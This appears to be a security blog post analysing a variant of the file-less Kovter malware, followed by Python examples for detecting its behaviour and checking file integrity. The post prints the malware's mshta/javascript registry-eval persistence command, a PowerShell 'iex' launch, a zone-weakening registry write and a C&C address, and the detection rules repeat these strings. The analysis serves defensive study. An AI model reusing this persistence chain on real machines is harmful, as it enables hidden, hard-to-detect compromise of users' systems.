File-less malware: Facelift of APT (Slice - 1)

File-less threats are not new to Blue Teams; they have long been an integral part of the threat landscape in the wild.

Introduced around mid-2014, this technique has been difficult for Blue teams to detect and even harder to defend against. This class of malware quickly became one of the primary ways of establishing a persistent threat, especially in the manufacturing industry.

These threats mostly spread through email, because in organizations removable media is usually disabled and downloads from unknown sources are blocked by the administrators. When the user downloads and unzips the attached zip file, the auto-executing file inside starts by itself.

At the level of organizational security policy, JavaScript is a weak point, because there is almost no way to restrict it: most modern websites depend on it. File-less threats use that loophole and create a registry entry containing malicious JavaScript. When the browser runs that script, it manipulates critical processes such as PowerShell.

Blue teams and SOC teams have little provision for inspecting the process memory of individual systems (there are thousands of them in an organization), which is why regular defences do not work against file-less malware. The pain grows when the IT or infrastructure team runs an antivirus scan and expects the threat to be detected after a Blue team member has spotted DNS records pointing at a known C&C server (these APTs use new IPs for each target, so a known IP with a bad reputation score is rare).


Kovter:

Kovter is a type of file-less malware that mainly establishes persistence by writing registry entries on Windows systems. Over time, researchers have worked out an outline of how Kovter operates.

This illustration by Trend Micro is a good visual representation of it.

[Image: Trend Micro illustration of the Kovter working procedure]

On 26th January, I stumbled upon a variant of Kovter.

MD5: b98fff8252a92d495f2080ea9588f71d
The file: B98FFF8252A92D495F2080EA9588F71D.exe

The file was located at "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"

This executable bypassed the blue-screen warning and executed itself.
The details observed were:

cmdChild: "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"
cmdParent: "C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"
image: C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe
time: 5844 ms

It also created/modified some user files:

access: READ_CONTROL, SYNCHRONIZE, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES

created: CREATED

device: DISK_FILE_SYSTEM

name: C:\Users\admin\AppData\Roaming\CaviarPlayroom

object: FILE

operation: CREATE

status: 0x00000000

Automatic execution of PowerShell was also observed:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex $env:dxts

This in turn runs the command line: regsvr32.exe

image: C:\Windows\system32\regsvr32.exe

Keep in mind that the values associated with regsvr32.exe were modified during the process edit; it is this subordinate executable that acts as the file-less malware.

key: HKEY_CLASSES_ROOT\oa73lpa\shell\open\command

name: (default)

operation: write

typeValue: REG_SZ

value: mshta "javascript:a2qjNDh="dXaID7";y5b=new ActiveXObject("WScript.Shell");SKfizDy1o="2854n0zr";Vfr9L1=y5b.RegRead("HKCU\\software\\8b99546859\\e229a6b9");nQWd1Jge="c";eval(Vfr9L1);i13lHmPyIB="tKlG";"

time: 64625 ms

Network behaviour shows regsvr32 connecting to the following destination:

ipDst: 69.27.118.233

ipSrc: 192.168.100.65

portDst: 80

portSrc: 51881

process: C:\Windows\system32\regsvr32.exe

time: 252.40 s

It was also found to be changing Internet settings:

key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

name: 1206

operation: write

typeValue: REG_DWORD

value: 0

time: 58547 ms
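The observations above (an .exe launched from the user's Temp folder, a shell\open\command handler pointing at mshta with an inline javascript: URI that reads a registry blob and eval()s it, regsvr32 talking HTTP, and an Internet Settings zone action flipped to 0) can each be turned into a simple telemetry rule. The following is an added example, not code from the original post: a small Python rule set run over constructed events whose fields mirror the key/value, process/ipDst/portDst and image records quoted above. The process list, the port set and the event schema are assumptions of this example, not a vendor's format.

```python
"""Detection rules for the Kovter-style behaviour described in the post.

Added example (not part of the original post). The sample events are
constructed to mirror the fields the post quotes; the process list,
port set and event schema are assumptions of this example.
"""
import re
from typing import Dict, List

# LOLBins that should not originate web traffic from a workstation
# (assumption of this example; extend to taste).
NON_BROWSER_NET = {"regsvr32.exe", "powershell.exe", "mshta.exe", "rundll32.exe"}

# shell\open\command handler launching mshta with an inline javascript: URI
MSHTA_JS = re.compile(r'^\s*mshta\s+"?javascript:', re.IGNORECASE)
# payload pulled out of the registry and executed in-memory
REG_EVAL = re.compile(r"RegRead\(|eval\(", re.IGNORECASE)

Event = Dict[str, str]


def check_registry(ev: Event) -> List[str]:
    """Flag mshta/javascript: persistence and weakened IE zone actions."""
    findings: List[str] = []
    key = ev.get("key", "")
    value = ev.get("value", "")
    if key.lower().endswith("\\shell\\open\\command") and MSHTA_JS.search(value):
        findings.append("fileless-persistence: mshta javascript: handler written to " + key)
        if REG_EVAL.search(value):
            findings.append("fileless-persistence: payload read from registry and eval()'d")
    # For IE zone actions a value of 0 means "enabled"
    if "\\internet settings\\zones\\" in key.lower() and value == "0":
        findings.append(
            f"zone-policy-weakened: {key} action {ev.get('name')} set to 0 (enabled)")
    return findings


def check_network(ev: Event) -> List[str]:
    """Flag web egress from a process that is not a browser."""
    proc = ev.get("process", "").rsplit("\\", 1)[-1].lower()
    if proc in NON_BROWSER_NET and ev.get("portDst") in {"80", "443"}:
        return [f"non-browser-egress: {proc} -> {ev.get('ipDst')}:{ev.get('portDst')}"]
    return []


def check_process(ev: Event) -> List[str]:
    """Flag executables started from the user's Temp directory."""
    image = ev.get("image", "").lower()
    if "\\appdata\\local\\temp\\" in image and image.endswith(".exe"):
        return [f"exec-from-temp: {ev.get('image')}"]
    return []


def run_rules(events: List[Event]) -> List[str]:
    out: List[str] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "registry":
            out += check_registry(ev)
        elif kind == "network":
            out += check_network(ev)
        elif kind == "process":
            out += check_process(ev)
    return out


# Constructed sample events modelled on the post's observations, plus two
# benign controls (a browser connection and an unrelated registry write).
SAMPLE_EVENTS: List[Event] = [
    {"type": "process",
     "image": r"C:\Users\admin\AppData\Local\Temp\B98FFF8252A92D495F2080EA9588F71D.exe"},
    {"type": "registry", "key": r"HKEY_CLASSES_ROOT\oa73lpa\shell\open\command",
     "name": "(default)",
     "value": r'mshta "javascript:a2qjNDh="dXaID7";y5b=new ActiveXObject("WScript.Shell");'
              r'Vfr9L1=y5b.RegRead("HKCU\\software\\8b99546859\\e229a6b9");eval(Vfr9L1);"'},
    {"type": "network", "process": r"C:\Windows\system32\regsvr32.exe",
     "ipDst": "69.27.118.233", "portDst": "80"},
    {"type": "registry",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1",
     "name": "1206", "value": "0"},
    {"type": "network", "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ipDst": "203.0.113.10", "portDst": "443"},
    {"type": "registry", "key": r"HKEY_CURRENT_USER\Software\Example\Setting",
     "name": "Foo", "value": "0"},
]

if __name__ == "__main__":
    for finding in run_rules(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone it prints five findings for the four malicious events and nothing for the two benign controls. The rules are deliberately narrow (an exact handler path suffix, a fixed LOLBin list) so that they produce few false positives on a fleet; broadening them is a tuning decision for the SOC.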



VirusTotal records confirmed that the destination IP had been newly commissioned and had no bad reputation. It has to be watched over time, though, since this Kovter-type executable was only recently found.

Unless the author can be identified, the motive behind later versions of this cannot be confirmed.

How could this particular file/threat have been identified?

  1. Tight email security should have blocked delivery of an email carrying a zip attachment from an unknown sender.
  2. Local execution rights. In most IT infrastructures, software installation is blocked or restricted through admin/IT rights, but portable executables are still allowed to run (in many organizations). Had the infrastructure team blocked execution of any .exe that is not on the list of installed software, the automatic execution of this particular file (an .exe) could have been prevented. (Keep in mind that when you click on Chrome, the shortcut resolves to chrome.exe and runs it, so if you plan to block .exe files entirely, stop right there.)
  3. An active IDS in conjunction with DLP software could have identified that the attempt to reach a particular IP was made by PowerShell and not by a browser. Unless you are an IT giant, you do not need people running curl or ssh from office laptops.
  4. Integrity checks on critical files could have identified the small tweaks.
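Item 4, an integrity check on critical files, is the simplest of these controls to build in-house. The following is an added example, not code from the original post: it hashes a directory tree into a JSON baseline and, on a later run, reports files that were added, removed or modified. The directory layout, file names and the "tampering" in the demo are all constructed in a temporary folder; nothing here refers to a real system path.

```python
"""File-integrity baseline check (added example, not from the original post).

Hashes every regular file under a root, stores the result as JSON, and
reports additions, removals and modifications on a later run. The tree
used by demo() is constructed in a temporary directory.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path
from typing import Dict, Set


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map each regular file under root (as a '/'-separated relative path) to its hash."""
    return {
        str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, Set[str]]:
    """Diff two baselines into added / removed / modified path sets."""
    old, new = set(baseline), set(current)
    return {
        "added": new - old,
        "removed": old - new,
        "modified": {p for p in old & new if baseline[p] != current[p]},
    }


def save_baseline(baseline: Dict[str, str], path: Path) -> None:
    path.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path: Path) -> Dict[str, str]:
    return json.loads(path.read_text())


def demo() -> Dict[str, Set[str]]:
    """Constructed scenario: baseline a small tree, then change it the way a
    persistence mechanism might (edit a config, drop a file, remove a file)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "critical"
        (root / "bin").mkdir(parents=True)
        (root / "bin" / "tool.exe").write_bytes(b"MZ original")      # constructed
        (root / "config.ini").write_text("scripting=disabled\n")      # constructed
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(root), baseline_file)

        # simulated tampering after the baseline was taken
        (root / "config.ini").write_text("scripting=enabled\n")
        (root / "bin" / "dropped.dll").write_bytes(b"MZ new")
        (root / "bin" / "tool.exe").unlink()

        return compare(load_baseline(baseline_file), build_baseline(root))


if __name__ == "__main__":
    for category, paths in demo().items():
        print(f"{category}: {sorted(paths)}")
```

In production the baseline file must live somewhere the monitored host cannot write to (a read-only share or a central server), otherwise whatever modified the files can also rewrite the baseline.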


Release note: I will try to add another analysis whenever I get a previously used spreader (file zero).





